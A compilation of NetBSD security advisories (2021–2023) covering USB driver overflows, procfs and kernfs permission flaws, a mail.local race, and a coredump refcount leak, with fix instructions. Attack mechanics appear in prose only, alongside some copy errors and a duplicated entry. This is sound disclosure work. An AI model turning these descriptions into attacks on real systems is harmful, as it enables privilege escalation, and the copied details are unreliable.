-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2023-001 = Topic: Multiple buffer overflows in USB drivers Version:NetBSD-current: affected up to 9.99.32 NetBSD 10.0_BETA: not affected NetBSD 9.3: not affected NetBSD 9.2: not affected NetBSD 9.1: not affected NetBSD 9.0: not affected NetBSD 8.2: not affected NetBSD 8.1: affected NetBSD 8.0: affected Severity: A malicious USB device can execute code in the kernel Fixed: NetBSD-current: 2020-01-01 NetBSD-10 branch: N/A NetBSD-9 branch:N/A NetBSD-8 branch:2020-01-02 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A malicious USB device can execute code in the kernel. Technical Details = Multiple buffer overflows in src/sys/dev/usb/uthum.c were found: sc_{o,f}len are controlled by the USB device. By crafting the former, the device can leak stack data. By crafting the latter, the device can overwrite the stack. The combination of the two means the device can ROP the kernel and obtain code execution (demonstrated with an actual exploit over vHCI). Additionally, the lengths were not truncated to the size of the buffers. Multiple buffer overflows in src/sys/dev/usb/uhid.c were found: In several places, there was no check to see if size + extra fits into the buffer. src/sys/dev/usb/ucycom.c: The lengths at attach time were not validated. Solutions and Workarounds = Update the kernel to a fixed version and reboot. There are pre-built binaries for all architectures and NetBSD versions at: https://nycdn.netbsd.org/pub/NetBSD-daily/ For example you can find the standard GENERIC kernel for NetBSD-9/amd64 at: https://nycdn.netbsd.org/pub/NetBSD-daily/netbsd-9/latest/amd64/binary/kernel/netbsd-GENERIC.gz Alternatively to build from source for all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/dev/usb # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Maxime Villard for finding and fixing the vulnerability. Revision History 2023-06-28 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2023-NNN.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2023, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2023-001.txt,v 1.1 2023/06/28 15:28:57 christos Exp $ -BEGIN PGP SIGNATURE- iQJQBAEBCAA6FiEEJxEzJivzXLUNT1BGiSYeF/XvSf8FAmScUbocHHNlY3VyaXR5 LW9mZmljZXJAbmV0YnNkLm9yZwAKCRCJJh4X9e9J/+5ND/0eVYPYyX9iNFXR5kso 8bpPUO/q07p4bJCloiDKfrhOLhzHjJFBvWKU6wDAvbCI228jkb/7KtCztFpaNnKD JzhNMlOO2+1u3bpQvtHAQGSFFKFFVLvfIbJAnTRsiZsksvs+xc0Gl+zVmXYln/xB +BFpeq0OKliCWFUqVCoDhqaBqdgGh3TB583HRefYlNuvurPKf4LWwkqqfLjNcUeo yUAve0MJ3P41Pn2BlyJuwslx7o17tBP3aFygSCWenAy676LVtn9tRds0fZgBkikz xYLAJVT52XnBSxbT7+eUPCb0lGkQSX/qwA+wQPeWsV2T3tPAd6gwzxwjl5AkA91b 0RRmC5MpfjKoqXBUTxXoRJCFQZOHZv3UzpdVS1JYSeLTIvMZS0+MYXn6XGwR/qSr aJZGVkdZhjYN58LSpihORBNWo77RcHuj8O5Siqi9nR3WS8Mi1uaCdytiv2UXwi5f ejoDTIAkV8I5ZstRyqBiWL2OaeNsf4XXXwWrpdt7ML+qBWprcm2ZYsPOAmufdMFN U8dadakXngtFdTvGJ8zYiIWT5trzseWXHJNEFshQJXelg9bJ8CBBtjOL3yypkC/L Nd0ulB79A7Q4gsr6FzeVNZsWB5HN8rnqslNXlUA77qaxUaYCPS+R/3a5UMB6xYdQ x5qHTCSqReHUlSZ0GIL4Fv9gnA== =PX3W -END PGP SIGNATURE-
NetBSD Security Advisory 2022-004: procfs(5) missing permission checks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2022-004 = Topic: procfs(5) missing permission checks Version:NetBSD-current: affected prior to 2022-06-18 NetBSD 9.2: affected NetBSD 8.2: affected Severity: Malicious user may read from opened file descriptors by other processes. Fixed: NetBSD-current: June 17, 2022 NetBSD-9 branch:June 17, 2022 NetBSD-8 branch:June 17, 2022 Please note that NetBSD releases prior to 8 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Due to missing permission checks it was possible to reuse open descriptors which are exposed in the procfs(5) [pid]/fd/ directory. It might allow malicious user to bypass permission checks and read data from opened descriptor under some circumstances. Technical Details = Directory fd/ which is available per process in the procfs(5) is exposing all opened file descriptors by a process, because of the missing VOP_ACCESS check during the VOP_LOOKUP(9) operation. Due to lack of proper access verification, malicious user is allowed to open files from the directory with the file descriptors, because permissions of the directory are not effectively checked. An example scenario that leads to data leak is as follows: the file with permissions 644 protected by the directory permissions 700, if process opened the file, it is possible to obtain file descriptor by malicious user by opening it directly from the exposed fd/ folder by the procfs(5). Solutions and Workarounds = Immediate workaround: unmount procfs(5) and mark it "noauto" in /etc/fstab. Please note that some programs may need access to procfs(5) in order to work correctly. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/kern-GENERIC.tgz cd / tar xzpf /var/tmp/kern-GENERIC.tgz with the following replacements: REL = the release version you are using BUILD = the source date of the build. 20220618 and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version of the kernel. For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Mateusz Kocielski (shm@) who analyzed this problem and supplied the fixes. Revision History 2022-10-04 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2022-004.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/support/security/ Copyright 2022, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $Id: NetBSD-SA2022-004.txt,v 1.1 2022/10/04 13:48:36 christos Exp $ -BEGIN PGP SIGNATURE- iQJQBAEBCAA6FiEEJxEzJivzXLUNT1BGiSYeF/XvSf8FAmM8ObUcHHNlY3VyaXR5 LW9mZmljZXJAbmV0YnNkLm9yZwAKCRCJJh4X9e9J/4rlD/4lMc/pDB1lCqQdaVD4 SVdQCZN7j/V2R8Nt/iXRtigOCo8gzX1Y/vmJwpTCqf1G8rTRChjH3p+arHgOHvDJ jNBevmoG8Dmy3YSJmsWAiMcsMHiEwvD/sXKkzwWDXQHILklezQIEj6UIHqOOuG5+ n92HwNLvhBL7d96dRFrmKoaqjVN6X4DyCzrxdk3DD8+boc0Gyv+69I6uxwML538M EiC6x0k2ccwfwC3jhRGdvr1DeBoVLev+p6d88yHisFXDnRRCK3AzryvGr8jf+QJr KbPBZlW13FpRsBEa6pRzMArMT7u7LoDedyzL6bdKdVplgBkq/CLCl5mkfID0TIba EIh2tQwMWrk8zkrCXWqqnOxJgjremlm78lryCc2UTwIblZ+73wuAYz36hNAU1xed GN9xV59ydjOFJunf00RWoAURpOP6629Cli2Pb3DVrZGJrMjNV2TyGol2+lERCK7v dDCQFfF3616xPDys+7bKNGhlMu7Wd0Eo5eVuqGwAoHtL8hbjshW+iS0h0/nmxFJA T0klPZk/m3kQbRjXYR0dl1rd5fhdFLhTo9aFWf5YbgYbKQbKRlg16ejAjg/m29vC
NetBSD Security Advisory 2022-003: Race condition in mail.local(8)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2022-003 = Topic: Race condition in mail.local(8) Version:NetBSD-current: affected prior to 2022-05-17 NetBSD 10: not affected NetBSD 9*: affected NetBSD 8*: affected Severity: Local user may be able to own any file or append arbitrary data Fixed: NetBSD-current: May 17, 2022 NetBSD-9 branch:May 17, 2022 NetBSD-8 branch:May 17, 2022 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A race condition exists in the mail.local(8) (/usr/libexec/mail.local) program which is setuid root. That may be exploited in order to change the ownership of or append arbitrary data to an arbitrary file. A malicious local user may exploit the race condition to acquire write permissions to a critical system file, and leverage the situation to acquire escalated privileges. This was originally addressed in NetBSD-SA2016-006 and has been assigned CVE-2016-6253. The fix proved inefficient and had to be fixed again, which is the reason for this new advisory. Technical Details = The user mailbox (typically /var/mail/$USER) which is used to deliver a message, is checked using lstat(2) to verify that the file is not a symlink. Then if the file is not a symlink, it's opened. If the file does not exist, it is created with another open(2) call. There is a tiny window between the two open calls in which the attacker could symlink it to a arbitrary file, and the mail.local program then would chown the file the symlink points to. Solutions and Workarounds = Potential workaround is to remove /usr/libexec/mail.local, if you use postfix(1) as the only way of delivering mails. mail.local(8) program was used by sendmail(8) which is no longer shipped with the NetBSD (currently postfix(1) is used as a default MTA). mail.local(8) dependency should be checked manually in case of other MTAs). To apply a fixed version from a releng build, fetch a fitting base.{tgz,tar.xz} from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz cd / tar xzpf /var/tmp/base.tgz libexec/mail.local with the following replacements: REL = the release version you are using BUILD = the source date of the build. %DATE%* and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your mail.local(8) binaries by updating your source tree and rebuilding and installing a new version of mail.local(8). * NetBSD-current: Systems running NetBSD-current dated from before 2022-05-18 should be upgraded to NetBSD-current dated 2022-05-18 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): src/libexec/mail.local To update from CVS, re-build, and re-install mail.local(8): # cd src # cvs update -d -P libexec/mail.local # cd libexec/mail.local # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 8.* or 9.*: Systems running NetBSD 8.* or 9.* sources dated from before 2022-05-18 should be upgraded from NetBSD 8.* or 9.* sources dated 2022-05-18 or later. The following files/directories need to be updated from the netbsd-8 or netbsd-9 branches: src/libexec/mail.local To update from CVS, re-build, and re-install mail.local(8): # cd src # cvs update -r -d -P libexec/mail.local # cd libexec/mail.local # make USETOOLS=no cleandir dependall # make USETOOLS=no install Thanks To = Jan Schaumann for pointing out the ineffectiveness of the original 2016-07-19 fix. Revision History 2022-10-04 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2022-003.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2022, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2022-003.txt,v 1.1 2022/10/04 13:48:16 christos Exp $ -BEGIN PGP SIGNATURE-
NetBSD Security Advisory 2022-002: Coredump credential reference count leak
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2022-002 = Topic: Coredump credential reference count leak Version:NetBSD-current: affected prior to 2022-09-10 NetBSD 9.2: affected NetBSD 8.2: affected Severity: Malicious user may read from opened file descriptors by other processes. Fixed: NetBSD-current: September 10, 2022 NetBSD-9 branch:September 10, 2022 NetBSD-8 branch:September 10, 2022 Please note that NetBSD releases prior to 8 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract The coredump handling code always leaks a reference to the dumped processes cred structure. An attacker may cause the reference count to overflow, leading to a use after free (UAF). Solutions and Workarounds = Set the coredump resource limit to 0 to prevent coredumps in the system. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/kern-GENERIC.tgz cd / tar xzpf /var/tmp/kern-GENERIC.tgz with the following replacements: REL = the release version you are using BUILD = the source date of the build. 20220910 and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version of the kernel. For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Chris J-D for discovering, analyzing the problem and proposing a fix. Revision History 2022-10-02 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2022-002.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/support/security/ Copyright 2022, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $Id: NetBSD-SA2022-002.txt,v 1.1 2022/10/02 14:02:28 christos Exp $ -BEGIN PGP SIGNATURE- iQJQBAEBCAA6FiEEJxEzJivzXLUNT1BGiSYeF/XvSf8FAmM5mfUcHHNlY3VyaXR5 LW9mZmljZXJAbmV0YnNkLm9yZwAKCRCJJh4X9e9J/xrHD/0Wbq+Udq/u0cuF97kH /3MOresRMPCTg8TOjvC88ONJOwCU/qh7txV/STIHD+HBOsLu47DbcFzKTJjIsiGQ fTeeMIs3WH04J4+kEzJtmUxvRfp0Yvy2LmOnn1hWh9iUEOm+k4U8eWnOzo6PTlli 10mz8WaNRA/aMbUsPlL9dSn/c8InGVxJvSR1w1K8O+nox+E08QCymO/mO+V70K/E VTlf9zQwZU02J2k2hChGHjBJKh/VvdG5He5pyTT9a9aTnSxwwZkdJE7+GuyLmhSg D9rp5mJo+TAeY4kn5SAiByaullc+uwfg1dfr2D81Qp9rFIYCjWPYJpFrN0XTVhVk j+eCWX0FSCD/qdUUDLp67coF2EgoDkKo8NxPoxE2AR6N9covcwAmi4E8CGsO4+Kl WEAuaoSOQvdU/nBms8VH0BWYWzmVwq3sk2gHHXw88r1dNjhsJ/ojiyOWOt2yP6uE gceCFY+qaTrAo5hGgcOLh9EzfDzSrq3f/8fFwLuZeeDVQsmVhg0ltRVi9eNIXr/2 qxp4RBPB7bINHQR7uT/9hyFXxp4+SsWSzau+9Z61Z6WXEA7i24jHXUvTtTTqSa/r T+znbCJ8M07oU4TSG3dR4VmILwebHvW/zVZfsE8KzA/o5A30wSRkoRGIjULMd5iY gmObL5NqCIwT81wHOoPk2Kz6oA== =RXBd -END PGP SIGNATURE-
NetBSD Security Advisory 2022-002: Coredump credential reference count leak
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2022-002 = Topic: Coredump credential reference count leak Version:NetBSD-current: affected prior to 2022-09-10 NetBSD 9.2: affected NetBSD 8.2: affected Severity: Malicious user may read from opened file descriptors by other processes. Fixed: NetBSD-current: September 10, 2022 NetBSD-9 branch:September 10, 2022 NetBSD-8 branch:September 10, 2022 Please note that NetBSD releases prior to 8 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract The coredump handling code always leaks a reference to the dumped processes cred structure. An attacker may cause the reference count to overflow, leading to a use after free (UAF). Solutions and Workarounds = Set the coredump resource limit to 0 to prevent coredumps in the system. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/kern-GENERIC.tgz cd / tar xzpf /var/tmp/kern-GENERIC.tgz with the following replacements: REL = the release version you are using BUILD = the source date of the build. 20220910 and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version of the kernel. For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Chris J-D for discovering, analyzing the problem and proposing a fix. Revision History 2022-10-02 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2022-002.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/support/security/ Copyright 2022, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $Id: NetBSD-SA2022-002.txt,v 1.1 2022/10/02 14:02:28 christos Exp $ -BEGIN PGP SIGNATURE- iQJQBAEBCAA6FiEEJxEzJivzXLUNT1BGiSYeF/XvSf8FAmM5mfUcHHNlY3VyaXR5 LW9mZmljZXJAbmV0YnNkLm9yZwAKCRCJJh4X9e9J/xrHD/0Wbq+Udq/u0cuF97kH /3MOresRMPCTg8TOjvC88ONJOwCU/qh7txV/STIHD+HBOsLu47DbcFzKTJjIsiGQ fTeeMIs3WH04J4+kEzJtmUxvRfp0Yvy2LmOnn1hWh9iUEOm+k4U8eWnOzo6PTlli 10mz8WaNRA/aMbUsPlL9dSn/c8InGVxJvSR1w1K8O+nox+E08QCymO/mO+V70K/E VTlf9zQwZU02J2k2hChGHjBJKh/VvdG5He5pyTT9a9aTnSxwwZkdJE7+GuyLmhSg D9rp5mJo+TAeY4kn5SAiByaullc+uwfg1dfr2D81Qp9rFIYCjWPYJpFrN0XTVhVk j+eCWX0FSCD/qdUUDLp67coF2EgoDkKo8NxPoxE2AR6N9covcwAmi4E8CGsO4+Kl WEAuaoSOQvdU/nBms8VH0BWYWzmVwq3sk2gHHXw88r1dNjhsJ/ojiyOWOt2yP6uE gceCFY+qaTrAo5hGgcOLh9EzfDzSrq3f/8fFwLuZeeDVQsmVhg0ltRVi9eNIXr/2 qxp4RBPB7bINHQR7uT/9hyFXxp4+SsWSzau+9Z61Z6WXEA7i24jHXUvTtTTqSa/r T+znbCJ8M07oU4TSG3dR4VmILwebHvW/zVZfsE8KzA/o5A30wSRkoRGIjULMd5iY gmObL5NqCIwT81wHOoPk2Kz6oA== =RXBd -END PGP SIGNATURE-
NetBSD Security Advisory 2022-001:
-BEGIN PGP MESSAGE- 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 H9zz77tfeP57a1++NfvAq48OZgbfPPnj/wE= =DPef -END PGP MESSAGE-
NetBSD Security Advisory 2021-002: Incorrect permissions in kernfs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2021-002 = Topic: Incorrect permissions in kernfs Version:NetBSD-current: affected between March 3, 2020 and July 6, 2021 NetBSD 9.2: affected NetBSD 9.1: affected NetBSD 9.0: affected NetBSD 8.*: not affected Severity: Local user may read any file on the root volume Fixed: NetBSD-current: July 6, 2021 NetBSD-9 branch:July 6, 2021 Please note that NetBSD releases prior to 8.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract The /kern file system contains references to the device the root volume was mounted from. It was discovered that the permissions were incorrect and allow any local user to read the device, thus allowing any local user to read any file on the root volume. Technical Details = The files /kern/rootdev and /kern/rrootdev are internally-generated device special files that refer to the device the root volume was mounted from. Until July 6, 2021 they were presented as mode 444 (readable to all users). Prior to February 3, 2020 (February 12 on the NetBSD-9 branch, then at 9.0_RC2) this was harmless because these device special files did not actually work; however, that problem was corrected without noticing that the permissions were unsafe. Solutions and Workarounds = Immediate workaround: unmount /kern and mark it "noauto" in /etc/fstab. This will work (without impacting system functionality) for all systems other than Xen DOM0. Unfortunately Xen requires access to other elements in kernfs. Note that while chmod on the offending files appears to succeed, it does not take and is not an adequate workaround. To fix the underlying problem, update the kernel. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tar.xz, kern-GENERIC_KASLR.tar.xz, kern-XEN3_DOM0.tar.xz, or kern-XEN3_DOMU.tar.xz (depending on which kernel you are using; uname -v will show, among other things, the name of the running kernel) from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/kern-GENERIC.tar.xz (or whichever) cd / tar xzpf /var/tmp/kern-GENERIC.tar.xz with the following replacements: REL = the release version you are using BUILD = the source date of the build. 202107060400Z and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version. For affected NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/miscfs/kernfs/kernfs_vnops.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = David A. Holland Martin Husemann Jonathan A. Kollasch Jared McNeill Revision History 2021-07-14 Initial release More Information Advisories may be updated as new information becomes 